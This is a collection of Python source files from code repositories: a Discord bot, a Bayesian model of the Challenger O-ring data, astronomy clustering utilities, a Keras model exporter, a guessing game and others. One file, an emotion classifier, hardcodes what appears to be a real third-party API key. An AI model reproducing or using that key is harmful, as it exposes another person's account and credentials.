+{"seq_id":"424935675","text":"#!/usr/bin/env python3\n# coding: utf-8\nimport datetime\nimport sys\nfrom discord import Client, Message\nfrom commands import commands, log\n\nclient = Client()\n\ndef error(message: Message) -> Message:\n err_msg = \"Error: invalid command '%s'\" % message.content\n return client.send_message(message.channel, err_msg)\n\n@client.event\nasync def on_message(message: Message) -> None:\n # we do not want the bot to reply to itself\n if message.author == client.user:\n return\n # we only accept commands starting with '!'\n if message.content[0] != \"!\":\n return\n cmd_with_args = message.content.split(\" \")\n cmd = cmd_with_args[0][1:]\n args = [arg for arg in cmd_with_args[1:] if arg != \"\"]\n if cmd in commands:\n await commands[cmd](client, message, args)\n else:\n await error(message)\n\nif __name__ == '__main__':\n try:\n log.write_to_log_file('Bot started')\n token = sys.argv[1]\n client.run(token)\n except Exception as e:\n log.write_to_log_file(e)\n","sub_path":"src/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"284962380","text":"'''Example of PyMC - The Challenger Disaster\n'''\n\n# author: Thomas Haslwanter, date: Sept-2013\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nimport pandas as pd\nimport seaborn as sns\nimport os\nimport pymc as pm\n\ndef logistic(x, beta, alpha=0):\n return 1.0 / (1.0 + np.exp(np.dot(beta, x) + alpha))\n\nsns.set_context('poster')\n\n# --- Get and show the O-ring data ---\ndataDir = r'..\\Data\\data_bayes'\ninFile = os.path.join(dataDir, 'challenger_data.csv')\n\nchallenger_data = np.genfromtxt(inFile, skip_header=1, usecols=[1, 2],\n missing_values='NA', delimiter=',')\n\n# drop the NA values\nchallenger_data = challenger_data[~np.isnan(challenger_data[:, 1])]\n\n# plot it, as a function of tempature (the first column)\nprint(\"Temp (F), O-Ring failure?\")\nprint(challenger_data)\n\n# First plot\nplt.figure()\nnp.set_printoptions(precision=3, suppress=True)\n\nplt.scatter(challenger_data[:, 0], challenger_data[:, 1], s=75, color=\"k\",\n alpha=0.5)\nplt.yticks([0, 1])\nplt.ylabel(\"Damage Incident?\")\nplt.xlabel(\"Outside temperature (Fahrenheit)\")\nplt.title(\"Defects of the Space Shuttle O-Rings vs temperature\")\n\ncurDir = os.path.abspath(os.path.curdir)\noutFile = 'Challenger_ORings.png'\nplt.tight_layout\nplt.savefig(outFile, dpi=200)\nprint('Data written to {0}'.format(os.path.join(curDir, outFile)))\n \nplt.show()\n\n# --- Perform the MCMC-simulations ---\ntemperature = challenger_data[:, 0]\nD = challenger_data[:, 1] # defect or not?\n\n# Define the prior distributions for alpha and beta\n# 'value' sets the start parameter for the simulation\n# The second parameter for the normal distributions is the \"precision\",\n# i.e. the inverse of the standard deviation\nbeta = pm.Normal(\"beta\", 0, 0.001, value=0)\nalpha = pm.Normal(\"alpha\", 0, 0.001, value=0)\n\n# Define the model-function for the temperature\n@pm.deterministic\ndef p(t=temperature, alpha=alpha, beta=beta):\n return 1.0 / (1. + np.exp(beta * t + alpha))\n\n# connect the probabilities in `p` with our observations through a\n# Bernoulli random variable.\nobserved = pm.Bernoulli(\"bernoulli_obs\", p, value=D, observed=True)\n\n# Combine the values to a model\nmodel = pm.Model([observed, beta, alpha])\n\n# Perform the simulations\nmap_ = pm.MAP(model)\nmap_.fit()\nmcmc = pm.MCMC(model)\nmcmc.sample(120000, 100000, 2)\n\n# --- Show the resulting posterior distributions ---\nalpha_samples = mcmc.trace('alpha')[:, None] # best to make them 1d\nbeta_samples = mcmc.trace('beta')[:, None]\n\nplt.figure(figsize=(12.5, 6))\n\n# histogram of the samples:\nplt.subplot(211)\nplt.title(r\"Posterior distributions of the variables $\\alpha, \\beta$\")\nplt.hist(beta_samples, histtype='stepfilled', bins=35, alpha=0.85,\n label=r\"posterior of $\\beta$\", color=\"#7A68A6\", normed=True)\nplt.legend()\n\nplt.subplot(212)\nplt.hist(alpha_samples, histtype='stepfilled', bins=35, alpha=0.85,\n label=r\"posterior of $\\alpha$\", color=\"#A60628\", normed=True)\nplt.legend()\n\ncurDir = os.path.abspath(os.path.curdir)\noutFile = 'Challenger_Parameters.png'\nplt.savefig(outFile, dpi=200)\nprint('Data written to {0}'.format(os.path.join(curDir, outFile)))\n\nplt.show()\n\n# --- Show the probability curve ----\n# Draw the probability as a function of time\nt = np.linspace(temperature.min() - 5, temperature.max() + 5, 50)[:, None]\np_t = logistic(t.T, beta_samples, alpha_samples)\n\nmean_prob_t = p_t.mean(axis=0)\n\nplt.figure(figsize=(12.5, 4))\n\nplt.plot(t, mean_prob_t, lw=3, label=\"average posterior \\nprobability \\\nof defect\")\nplt.plot(t, p_t[0, :], ls=\"--\", label=\"realization from posterior\")\nplt.plot(t, p_t[-2, :], ls=\"--\", label=\"realization from posterior\")\nplt.scatter(temperature, D, color=\"k\", s=50, alpha=0.5)\nplt.title(\"Posterior expected value of probability of defect; \\\nplus realizations\")\nplt.legend(loc=\"lower left\")\nplt.ylim(-0.1, 1.1)\nplt.xlim(t.min(), t.max())\nplt.ylabel(\"probability\")\nplt.xlabel(\"temperature\")\n\ncurDir = os.path.abspath(os.path.curdir)\noutFile = 'Challenger_Probability.png'\nplt.savefig(outFile, dpi=200)\nprint('Data written to {0}'.format(os.path.join(curDir, outFile)))\n\nplt.show()\n\n# --- Draw CIs ---\nfrom scipy.stats.mstats import mquantiles\n\n# vectorized bottom and top 2.5% quantiles for \"confidence interval\"\nqs = mquantiles(p_t, [0.025, 0.975], axis=0)\nplt.fill_between(t[:, 0], *qs, alpha=0.7,\n color=\"#7A68A6\")\n\nplt.plot(t[:, 0], qs[0], label=\"95% CI\", color=\"#7A68A6\", alpha=0.7)\n\nplt.plot(t, mean_prob_t, lw=1, ls=\"--\", color=\"k\",\n label=\"average posterior \\nprobability of defect\")\n\nplt.xlim(t.min(), t.max())\nplt.ylim(-0.02, 1.02)\nplt.legend(loc=\"lower left\")\nplt.scatter(temperature, D, color=\"k\", s=50, alpha=0.5)\nplt.xlabel(\"temp, $t$\")\n\nplt.ylabel(\"probability estimate\")\nplt.title(\"Posterior probability estimates given temp. $t$\")\n\ncurDir = os.path.abspath(os.path.curdir)\noutFile = 'Challenger_CIs.png'\nplt.savefig(outFile, dpi=200)\nprint('Data written to {0}'.format(os.path.join(curDir, outFile)))\n\nplt.show()","sub_path":"Code3/challenger.py","file_name":"challenger.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"122904692","text":"def convert_values(self, value, field):\n \"\"\"Coerce the value returned by the database backend into a consistent type that\n is compatible with the field type.\n \"\"\"\n internal_type = field.get_internal_type()\n if internal_type == 'DecimalField':\n return value\n elif internal_type and internal_type.endswith('IntegerField') or internal_type == 'AutoField':\n return int(value)\n elif internal_type in ('DateField', 'DateTimeField', 'TimeField', 'CharField', 'EmailField', 'SlugField',\n 'URLField'):\n return value\n # No field, or the field isn't known to be a decimal or integer\n # Default to a float\n return float(value)\n","sub_path":"monkey/django.py","file_name":"django.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"31532894","text":"# Various old disused codes from galcentricutils.\ndef GALCENT_to_ICRS(self, hdfdir, hdfname, group, set):\n # Set up utilities environment for radec conversion\n utilities = utils()\n # Set up HDF and grab table, and SkyCoord objects for all targets.\n writer = hdfutils.hdf5_writer(hdfdir, hdfname)\n table = writer.read_table(group, set)\n skycoords = coord.SkyCoord(x=table['x'] * u.kpc, y=table['y'] * u.kpc, z=table['z'] * u.kpc,\n v_x=table['vx'] * u.km/u.s, v_y=table['vy']*u.km/u.s, v_z=table['vz']*u.km/u.s,\n frame=\"galactocentric\")\n # Effect conversion to ICRS, work through objects, collect converted quantities.\n icrs_skycoords = skycoords.transform_to(coord.ICRS)\n ra_list, dec_list, pmra_list, pmdec_list, distance_list, radial_velocity_list = [],[],[],[],[],[]\n textradeclist = []\n for object in icrs_skycoords:\n ra, dec, pmra_cosdec, pmdec, distance, radial_velocity = object.ra/u.deg, \\\n object.dec/u.deg, \\\n object.pm_ra_cosdec / (u.mas * u.yr), \\\n object.pm_dec / (u.mas * u.yr), \\\n object.distance / u.kpc, \\\n object.radial_velocity / (u.km / u.s)\n # Discard the dimensionless unit.\n ra, dec, pmra_cosdec, pmdec, distance, radial_velocity = ra.value, dec.value, \\\n pmra_cosdec.value, pmdec.value, \\\n distance.value, radial_velocity.value\n # Remove cosdec, append to list\n pmra = pmra_cosdec / math.cos(math.radians(dec))\n # Grab text values\n radec = [ra,dec]\n textradec = utilities.deg_radec(radec)\n textradeclist.append(textradec)\n ra_list.append(ra), dec_list.append(dec), pmra_list.append(pmra), pmdec_list.append(pmdec), \\\n distance_list.append(distance), radial_velocity_list.append(radial_velocity)\n\n # Modify and save table.\n table['textradec'] = np.array(textradeclist)\n table['ra'] = ra_list\n table['dec'] = dec_list\n table['pmra'] = pmra_list\n table['pmdec'] = pmdec_list\n table['dist'] = distance_list\n table['vlos'] = radial_velocity_list\n writer.write_table(group, set, table)\ndef ICRS_to_GALCENT(self, hdfdir, hdfname, group, set):\n # Set up HDF and grab table, and SkyCoord objects for all targets.\n writer = hdfutils.hdf5_writer(hdfdir, hdfname)\n table = writer.read_table(group, set)\n skycoords = coord.SkyCoord(ra=table['ra']*u.deg,\n dec=table['dec']*u.deg,\n distance=table['dist']*u.kpc,\n pm_ra_cosdec=table['pmra']*np.cos(np.deg2rad(table['dec']))*u.mas/u.yr,\n pm_dec=table['pmdec']*u.mas/u.yr,\n radial_velocity=table['vlos']*u.km/u.s,\n frame=\"icrs\")\n # Effect conversion to Galactocentric, work through objects, collect converted quantities.\n galcent_skycoords = skycoords.transform_to(coord.Galactocentric)\n x_list, y_list, z_list, vx_list, vy_list, vz_list = [], [], [], [], [], []\n for object in galcent_skycoords:\n x,y,z,vx,vy,vz = object.x/u.kpc, object.y/u.kpc, object.z/u.kpc, \\\n object.v_x/(u.km/u.s), object.v_y/(u.km/u.s), object.v_z/(u.km/u.s)\n # Discard the dimensionless unit.\n x,y,z,vx,vy,vz = x.value,y.value,z.value,vx.value,vy.value,vz.value\n\n # Append to list\n x_list.append(x), y_list.append(y), z_list.append(z), \\\n vx_list.append(vx), vy_list.append(vy), vz_list.append(vz)\n\n # Modify and save table.\n table['x'],table['y'],table['z'],table['vx'],table['vy'],table['vz'] = x_list,y_list,z_list,\\\n vx_list,vy_list,vz_list\n writer.write_table(group, set, table)\ndef vec_ICRS_to_GALCENT(self, ra,dec,distance,dmura,dmudec,vlos):\n vecskycoord = coord.SkyCoord(ra=ra*u.deg,\n dec=dec*u.deg,\n distance=distance*u.kpc,\n pm_ra_cosdec=dmura*np.cos(np.radians(dec))*u.mas/u.yr,\n pm_dec=dmudec*u.mas/u.yr,\n radial_velocity=vlos*u.km/u.s,\n frame=\"icrs\")\n vecskycoord = vecskycoord.transform_to(coord.Galactocentric)\n x,y,z,vx,vy,vz = vecskycoord.x/u.kpc, vecskycoord.y/u.kpc, vecskycoord.z/u.kpc, \\\n vecskycoord.v_x/(u.km/u.s), vecskycoord.v_y/(u.km/u.s), vecskycoord.v_z/(u.km/u.s)\n x,y,z,vx,vy,vz = x.value,y.value,z.value,vx.value,vy.value,vz.value\n return [x,y,z,vx,vy,vz]\n\n# Clustering\nclass cluster3d(object):\n def __init__(self):\n self.null = \"null\"\n\n # Remove outlying L-values (units of sigma). Assumes r has already been cleaned out (see: gcc_table)\n def clean(self, table, sig_tolerance):\n\n Ls = [table['Lx'],table['Ly'],table['Lz']]\n mean_L, std_L = np.array([np.mean(d) for d in Ls]),np.array([np.std(d) for d in Ls])\n table_cleaned = table\n for num,row in enumerate(table):\n L = np.array([row['Lx'],row['Ly'],row['Lz']])\n L_dif = L - mean_L\n mag_L_dif = np.array([abs(d) for d in L_dif])\n sig_L_dif = mag_L_dif/std_L\n for i in sig_L_dif:\n if i >= sig_tolerance:\n table_cleaned.remove_row(num)\n break\n return table_cleaned\n\n # kmeans-cluster the given table: returns the inertia of the table, too.\n def kmeans(self, table, k, savedex, browser):\n # Set up vectors/positions/etc\n table = self.clean(table, 5)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n km = KMeans(n_clusters=k,n_init=10,max_iter=300,algorithm=\"full\")\n kmfit = km.fit_predict(L) # list with indices for cluster\n inertia = km.inertia_\n table['k_index'] = np.array(kmfit)\n graphutils.threed_graph().kmeans_L(table, savedex + \".html\", browser)\n return table, inertia\n\n # DBSCAN. params are \"eps\" and \"min_samples.\" Browser=True opens in browser (append to others.)\n def dbs(self, table, eps, min_samples, browser):\n table = self.clean(table, 5)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n dbs = DBSCAN(eps=eps, min_samples=min_samples, metric=\"l1\", leaf_size=5)\n dbsfit = dbs.fit_predict(L)\n table['k_index'] = np.array(dbsfit)\n save_format = (\"DBS_TEST_EPS{0}_MINSAMP{1}\" + \".html\").format(eps, min_samples)\n graphutils.threed_graph().kmeans_L(table, save_format, browser)\n return table, dbs\n\n # Hierarchical DBS\n def hdbs(self, table, browser):\n table = self.clean(table, 5)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n hdbs = hdbscan.HDBSCAN(min_cluster_size=25,\n min_samples=15,\n metric=\"l2\")\n hdbsfit = hdbs.fit_predict(L)\n table['k_index'] = np.array(hdbsfit)\n #save_format = (\"HDBS_TEST_EPS{0}_MINSAMP{1}\" + \".html\").format(eps, min_samples)\n graphutils.threed_graph().kmeans_L(table, \"test_hdbs.html\", browser)\n graphutils.threed_graph().xmeans_L(table, \"test_hdbs.html\", browser)\n return table\n\n # OPTICS\n def optics(self, table):\n table = self.clean(table, 5)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n optics = OPTICS(metric=\"l1\", min_cluster_size=20, leaf_size=20, eps=1e4, max_eps=1e6)\n opticsfit = optics.fit_predict(L)\n table['k_index'] = np.array(opticsfit)\n graphutils.threed_graph().kmeans_L(table, \"test_plot\", False)\n return table\n\n # Agglomerative\n def aglom(self, table, k):\n table = self.clean(table,5)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n aglom = AgglomerativeClustering(n_clusters=k, linkage='ward')\n aglomfit = aglom.fit_predict(L)\n table['k_index'] = np.array(aglomfit)\n graphutils.threed_graph().kmeans_L(table, \"test_plot\", False)\n return table\n\n # Affinity Propagation\n def afprop(self, table):\n table = self.clean(table, 5)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n afprop = AffinityPropagation(damping=0.5)\n afpropfit = afprop.fit_predict(L)\n table['k_index'] = np.array(afpropfit)\n graphutils.threed_graph().kmeans_L(table, False, True)\n return table\n\n # Gaussian Mixture with Variational Bayes\n def bayesgaussmix(self, table, k, savedex, browser):\n # Set up vectors/positions/etc\n table = self.clean(table, 4)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n gm = BayesianGaussianMixture(n_components=k)\n gmfit = gm.fit_predict(L) # list with indices for cluster\n table['k_index'] = np.array(gmfit)\n graphutils.threed_graph().kmeans_L(table, savedex + \".html\", browser)\n return table\n\n # Gaussian Mixture - Euclidean\n def gaussmix(self, table, k, savedex, browser, graph):\n # Set up vectors/positions/etc\n table = self.clean(table, 5)\n L = np.array([table['Lx'], table['Ly'], table['Lz']]).T\n gm = GaussianMixture(n_components=k)\n gmfit = gm.fit_predict(L) # list with indices for cluster\n table['k_index'] = np.array(gmfit)\n if graph == True:\n graphutils.threed_graph().kmeans_L(table, savedex + \".html\", browser)\n bic, aic = gm.bic(L), gm.aic(L)\n return table, bic, aic\n\n # Grab aics/bics for varioues values of (k) for table.\n def gaussaicsbics(self, table, k_max, savedex):\n y = np.arange(1, k_max, 1)\n bics, aics = [], []\n for i in y:\n gmeansdone = self.gaussmix(table, i, \"test\", browser=False, graph=False)\n bics.append(gmeansdone[1]), aics.append(gmeansdone[2])\n plt.plot(y, bics, color=\"red\", label=\"bics\")\n plt.plot(y, aics, color=\"green\", label=\"aics\")\n plt.legend()\n try:\n os.mkdir(windows_directories.imgdir + \"\\\\gauss_aics_bics_test\")\n except:\n pass\n\n plt.savefig(windows_directories.imgdir + \"\\\\gauss_aics_bics_test\\\\\" + savedex + \".png\")\n plt.clf()\n plt.close()\n","sub_path":"master-streams/deprecated/DEPRECATED_galcentricutils.py","file_name":"DEPRECATED_galcentricutils.py","file_ext":"py","file_size_in_byte":10709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"381775511","text":"__author__ = 'mikhail'\nimport pickle\nimport indicoio\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\n\n\nclass Clf:\n clf = RandomForestClassifier(n_estimators=25, n_jobs = -1)\n flag = False\n memory = {}\n\n def __init__(self, filepath=\"/home/mikhail/PycharmProjects/JustCodeItHackathon/cgi-bin/ser.txt\"):\n with open(filepath,\"rb\") as f:\n Clf.memory = pickle.load(f)\n self.filepath = filepath\n\n X = Clf.memory['X']\n Y = Clf.memory['Y']\n if X.shape[0] != 0:\n flag = True\n Clf.clf.fit(X,Y)\n\n def dump(self):\n with open(self.filepath, \"wb\") as f:\n pickle.dump(Clf.memory, f )\n\n def getEmotion(self, url):\n indicoio.config.api_key = 'd6128b058d220992aa435762eeb81651'\n\n temp = indicoio.fer(url).values()\n X = np.array(temp)\n return X\n\n def predict(self, X):\n if not Clf.flag:\n return 1\n return Clf.clf.predict(X)\n\n def add(self,X, Y):\n with open(self.filepath,\"rb\") as f:\n Clf.memory['X'] = np.vstack((Clf.memory['X'], X))\n Clf.memory['Y'] = np.vstack((Clf.memory['Y'], Y))\n\n","sub_path":"cgi-bin/Clf.py","file_name":"Clf.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"130358279","text":"from PIL import Image\nfrom numpy import linalg\nimport json\ndataPath = r'F:/SWrk/gpTasks/data/originData/'\nresultPath = r'F:/SWrk/gpTasks/data/resources/'\nDefValNumpy = ['0', '1', '2', '3', '4', '5', '6', '7', '-', 'p']\nDefDir = {}\n\n\ndef get_hash(img):\n img_L = img.convert(\"L\")\n pixels = list(img_L.getdata())\n for p in range(0, len(pixels)):\n if pixels[p] is 192 or pixels[p] is 128:\n pixels[p] = 0\n else:\n pixels[p] = 1\n return pixels\n\n\ndef get_sparseMatrix(pixels):\n tempDoubleList = []\n for i in range(0, 16):\n tempList = pixels[(i*16):((i+1)*16)]\n tempDoubleList.append(tempList)\n return tempDoubleList\n\n\ndef get_maxEigvals(img):\n # matrix = get_sparseMatrix(get_hash(img))\n return max(linalg.eigvals(get_sparseMatrix(get_hash(img))))\n # emmm 好奇葩的特征值...\n # return linalg.eigvals(matrix)\n\n\ndef get_code(maxEigvals):\n return DefDir[str(maxEigvals)]\n\n\n# # 创建模板特征值存储的json文件时用到\n# for ietm in range(0, len(DefValNumpy)):\n# img_1 = Image.open(dataPath+DefValNumpy[ietm]+\".png\")\n# DefDir[ietm] = str(get_maxEigvals(img_1))\n# jsObj = json.dumps(DefDir)\n# # print(jsObj)\n# with open((dataPath+'DefMaxEigvals.josn').encode('utf-8'), \"w\") as ftemp:\n# ftemp.write(jsObj)\n\n# 从文件获取模板图片的特征值存入字典 \nwith open((dataPath+'DefMaxEigvals.josn').encode('utf-8'), \"r\") as ftemp:\n DefDir = json.load(ftemp)\nfor item in DefDir:\n DefDir[item] = complex(DefDir[item])\nprint(DefDir)\n ","sub_path":"Task5/cheB_back.py","file_name":"cheB_back.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"539285815","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: D:\\BuildAgent\\work\\test/iobjectspy/ml\\vision\\_models\\semantic_seg\\base_keras_models.py\n# Compiled at: 2019-12-31 04:09:04\n# Size of source mod 2**32: 9072 bytes\n\"\"\"\n@author: YangRuijie\n@license: \n@contact: yangruijie@supermap.com\n@software: \n@file: base_models.py\n@time: 7/23/19 6:49 AM\n@desc:\n\"\"\"\nimport os, time\nfrom collections import OrderedDict\nimport numpy as np, tensorflow as tf\nfrom keras.callbacks import TensorBoard, ModelCheckpoint\nfrom tensorflow import Tensor\nfrom tensorflow.python.saved_model import tag_constants\nfrom tensorflow.python.saved_model.signature_def_utils_impl import predict_signature_def\nimport tensorflow.python.saved_model as saved_model_builder\nfrom keras import backend as K\nfrom toolkit._keras_model_utils import ModelCheckpointLatest\nfrom ....._logger import log_warning, log_info\nfrom toolkit._toolkit import save_config_to_yaml\n\nclass Estimation:\n\n def __init__(self, model_path, config):\n if not isinstance(model_path, str):\n raise TypeError('model_path data type inappropriate ,should be str ')\n if not os.path.exists(model_path):\n raise Exception('model_path path not exists')\n self.model_path = model_path\n self.sess = None\n self.tf_inputs = None\n self.tf_outputs = None\n self.load_model(model_path)\n\n def estimate_img(self):\n pass\n\n def estimate_tile(self):\n pass\n\n def load_model(self, model_path):\n self.model_path = model_path\n self.sess = tf.Session()\n self.meta_graph_def = tf.saved_model.loader.load(self.sess, ['serve'], model_path)\n self.signature = self.meta_graph_def.signature_def\n self.sess.graph.finalize()\n\n def close_model(self):\n \"\"\"\n 关闭模型\n :return:\n \"\"\"\n self.sess.close()\n tf.reset_default_graph()\n\n def _predict_tile_local(self, predict_tile, out_shape):\n \"\"\"\n 利用给定的模型使用tensorflow推断得到模型预测结果\n :param predict_tile: ndarray 需要预测的数组片 形状为 (tile_nums,:) 即第一列为图片的数量\n :param out_shape: tuple 输出结果的形状 如(100,320,320,1)\n :return: ndarray 返回预测的结果\n \"\"\"\n x_tensor_name = self.signature['predict'].inputs['images'].name\n y_tensor_name = self.signature['predict'].outputs['scores'].name\n x = self.sess.graph.get_tensor_by_name(x_tensor_name)\n y = self.sess.graph.get_tensor_by_name(y_tensor_name)\n self.sess.graph.finalize()\n batch_size = 1\n total_batch = int(predict_tile.shape[0] / batch_size)\n for i in range(total_batch):\n out = self.sess.run(y, feed_dict={x: predict_tile[i * batch_size:(i + 1) * batch_size, :]})\n if i == 0:\n y_all = out\n else:\n y_all = np.concatenate((y_all, out), 0)\n\n y_out = np.expand_dims(y_all, axis=0)\n y_out.resize(out_shape)\n return y_out\n\n\nclass Trainer:\n\n def __init__(self):\n self.callbacks = []\n self.loss = []\n self.acc = []\n self.val_loss = []\n self.val_acc = []\n self.model_type = ''\n self.model_architecture = ''\n\n def init_callbacks(self, log_path=None):\n if log_path:\n self.config.trainer.callbacks.tensorboard_log_dir = os.path.join(log_path, time.strftime('%Y-%m-%d', time.localtime()), self.config.application.name, 'logs')\n self.config.trainer.callbacks.checkpoint_dir = os.path.join(log_path, time.strftime('%Y-%m-%d', time.localtime()), self.config.application.name, 'checkpoints')\n else:\n self.log_path = 'experiments'\n self.config.trainer.callbacks.tensorboard_log_dir = os.path.join('experiments', time.strftime('%Y-%m-%d', time.localtime()), self.config.application.name, 'logs')\n self.config.trainer.callbacks.checkpoint_dir = os.path.join('experiments', time.strftime('%Y-%m-%d', time.localtime()), self.config.application.name, 'checkpoints')\n if os.path.exists(self.config.trainer.callbacks.tensorboard_log_dir) is not True:\n os.makedirs(self.config.trainer.callbacks.tensorboard_log_dir)\n if os.path.exists(self.config.trainer.callbacks.checkpoint_dir) is not True:\n os.makedirs(self.config.trainer.callbacks.checkpoint_dir)\n self.callbacks.append(ModelCheckpoint(filepath=(os.path.join(self.config.trainer.callbacks.checkpoint_dir, '%s-{epoch:04d}-{val_loss:.4f}.hdf5' % self.config.application.name)),\n monitor=(self.config.trainer.callbacks.checkpoint_monitor),\n mode=(self.config.trainer.callbacks.checkpoint_mode),\n save_best_only=(self.config.trainer.callbacks.checkpoint_save_best_only),\n save_weights_only=(self.config.trainer.callbacks.checkpoint_save_weights_only),\n verbose=(self.config.trainer.callbacks.checkpoint_verbose)))\n self.callbacks.append(ModelCheckpointLatest(self.config.trainer.callbacks.checkpoint_dir))\n self.callbacks.append(TensorBoard(log_dir=(self.config.trainer.callbacks.tensorboard_log_dir),\n write_graph=(self.config.trainer.callbacks.tensorboard_write_graph)))\n\n def train(self):\n pass\n\n def _save_tfserving_model(self, model, out_path, export_version=None):\n \"\"\"\n save tfserving model\n :param model: keras model\n :param out_path:\n :param export_version:\n :return:\n \"\"\"\n K.set_learning_phase(0)\n with tf.device('/cpu:0'):\n new_model = model\n export_base_path = out_path\n if export_version is None:\n export_path = export_base_path\n else:\n export_path = os.path.join(export_base_path, str(export_version))\n while os.path.exists(export_path):\n export_path += '_1'\n\n builder = saved_model_builder.SavedModelBuilder(export_path)\n if not isinstance(new_model.input, Tensor):\n signature = predict_signature_def(inputs={'images' + str(i):input for i, input in enumerate(new_model.input)}, outputs={'scores': new_model.output})\n ModelinputputJson = [{'shape':input.shape.as_list()[1:], 'type':input.dtype.name, 'inputs':'images' + str(i)} for i, input in enumerate(new_model.input)]\n else:\n ModelinputputJson = [{'shape':new_model.input.shape.as_list()[1:], \n 'type':new_model.input.dtype.name, 'inputs':'images'}]\n signature = predict_signature_def(inputs={'images': new_model.input}, outputs={'scores': new_model.output})\n with K.get_session() as (sess):\n builder.add_meta_graph_and_variables(sess=sess, tags=[\n tag_constants.SERVING],\n signature_def_map={'predict': signature})\n builder.save()\n base_name = os.path.basename(export_path)\n config = OrderedDict({'model_type':self.model_type, \n 'framework':'keras', \n 'model_architecture':self.model_architecture, \n 'model_categorys':base_name, \n 'tile_size':self.tile_size, \n 'model_tag':'standard', \n 'signature_name':'predict', \n 'model_input':ModelinputputJson, \n 'model_output':[\n {'shape':new_model.output.shape.as_list()[1:], \n 'type':new_model.output.dtype.name, 'outputs':'scores'}], \n 'class_type':[OrderedDict(l.toDict()) for l in list(self.class_type)], \n 'is_stretch':0, \n 'batch_size':1})\n model_path = os.path.join(export_path, str(base_name) + '.sdm')\n save_config_to_yaml(config, model_path)\n log_info('model saved in dir : {}'.format(model_path))\n print('model saved in dir : {}'.format(model_path))","sub_path":"pycfiles/iobjectspy-10.0.1.0.tar/base_keras_models.py","file_name":"base_keras_models.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"276229482","text":"from random import randint\nprint(\"Hello the game begins\\nPlease choose number between 0 and 20\")\nnumber = randint(0,20)\nattempt = 3\ndef trying():\n\ttry:\n\t\tglobal attempt\n\t\tuserNumber = input(\"Nubmer: \")\n\t\tif int(userNumber) > number and attempt > 1:\n\t\t\tattempt = attempt - 1\n\t\t\tprint(\"You have a \" + str(attempt) + \" attempts\")\n\t\t\tprint(\"Try a smaller number\")\n\t\t\ttrying()\n\t\telif int(userNumber) < number and attempt > 1:\n\t\t\tattempt = attempt - 1\n\t\t\tprint(\"You have a \" + str(attempt) + \" attempts\")\n\t\t\tprint(\"Try a bigger number\")\n\t\t\ttrying()\n\t\telif int(userNumber) == number and attempt > 1:\n\t\t\tinput(\"You win!\")\n\t\telse:\n\t\t\tprint(\"Game over\\nThe number is \",number)\n\texcept ValueError:\n\t\tprint(\"ERROR. Try again please\")\ntrying()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"587920008","text":"import sys\n\ndef main():\n n = int(raw_input())\n a = {'one': 1}\n for i in xrange(n):\n st = raw_input()\n st = st.split()\n a[st[0]] = (float(st[1]) + float(st[2]) + float(st[3]))/3\n ans = raw_input()\n print(\"{:.2f}\\n\".format(a[ans]))\n\nif __name__ == '__main__':\n main()\n","sub_path":"Miscellaneous/Python Tutorials/Finding the percentage/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"133761979","text":"# Call Back\n\nimport time\nimport pigpio\nimport os\nimport sys\n\nif (1 < len(sys.argv)):\n\tMYFILEPATH = str(sys.argv[1])\nelse:\n\t# Put location of your randint here\n\tMYFILEPATH = 'randtimegeiger.txt'\n\n# Strip off previously used file from string\nMYFILEPATH_ID = MYFILEPATH.split (\"/\")[-1]\nMYFILEPATH_ID = MYFILEPATH[:(len(MYFILEPATH) - len(MYFILEPATH_ID))]\n\n# Process ID code\npid = os.getpid()\nfPid = open(MYFILEPATH_ID + \"pid.txt\", 'w')\nfPid.write(str(pid))\nfPid.close()\n\nfo = open(MYFILEPATH,'a')\n\n# Call Back Function\ndef mycb(x, y, z):\n\tt=time.time()\n\t#print t\n\tfo.write(str(t) + '\\n')\n\tfo.flush()\n\n# Setup Call Back\npin=pigpio.pi()\ncb=pin.callback(23, pigpio.FALLING_EDGE, mycb)\n\n# Sleep and collect times\nwhile 1:\n\ttime.sleep(1000)\n","sub_path":"Mike/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"202031569","text":"import pandas as pd\n\ndef PDReadExcel(fPath):\n fPath = 'Quant/util/test.xlsx'\n with pd.ExcelFile(fPath) as xlsF:\n aa =xlsF.sheet_names\n print(aa)\n #显示出读入excel文件中的表名字\n # table1=xls_file.parse('first_sheet')\n # table2=xls_file.parse('second_sheet')\n\n # data1 = pd.read_excel(xlsF)\n # print(data1)\n\n\ndef PDWriteExcel(df,fPath):\n 